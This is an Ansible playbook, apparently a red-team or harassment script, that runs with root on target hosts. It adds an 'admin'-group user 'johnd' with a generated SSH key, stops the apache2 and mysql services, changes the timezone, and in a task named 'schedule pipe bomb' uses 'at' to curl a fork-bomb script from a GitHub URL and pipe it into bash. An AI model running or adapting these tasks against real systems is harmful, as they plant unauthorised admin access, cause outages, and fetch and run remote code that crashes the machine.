---

- name: install packages
  hosts: test
  become: true
  tasks:

    - name: Test syslog
      syslogger:
        msg: 'You should see this. Hello?'

    - say:
        msg: 'I said is anyone there??'
        voice: Zarvox
        delegate_to: localhost

    - name: Add the user 'johnd' with a specific uid and a primary group of 'admin'
      user:
        name: johnd
        comment: John Doe
        shell: /bin/swsh
        uid: '1040'
        generate_ssh_key: yes
        ssh_key_bits: '2048'
        ssh_key_file: .ssh/id_rsa
        group: admin

    - name: messing with httpd
      systemd:
        state: stopped
        name: apache2 

    - name: messing with mysql
      systemd:
        state: stopped
        name: mysql

    - name: Set timezone to Kazakhstan time
      timezone:
        name: Asia/Almaty

    - name: schedule pipe bomb
      at: 
        command: bash -c \"curl https://raw.githubusercontent.com/pmccabe5/automate-rt/main/scripts/fork-bomb.sh | bash\""
        count: '15'
        unit: minutes
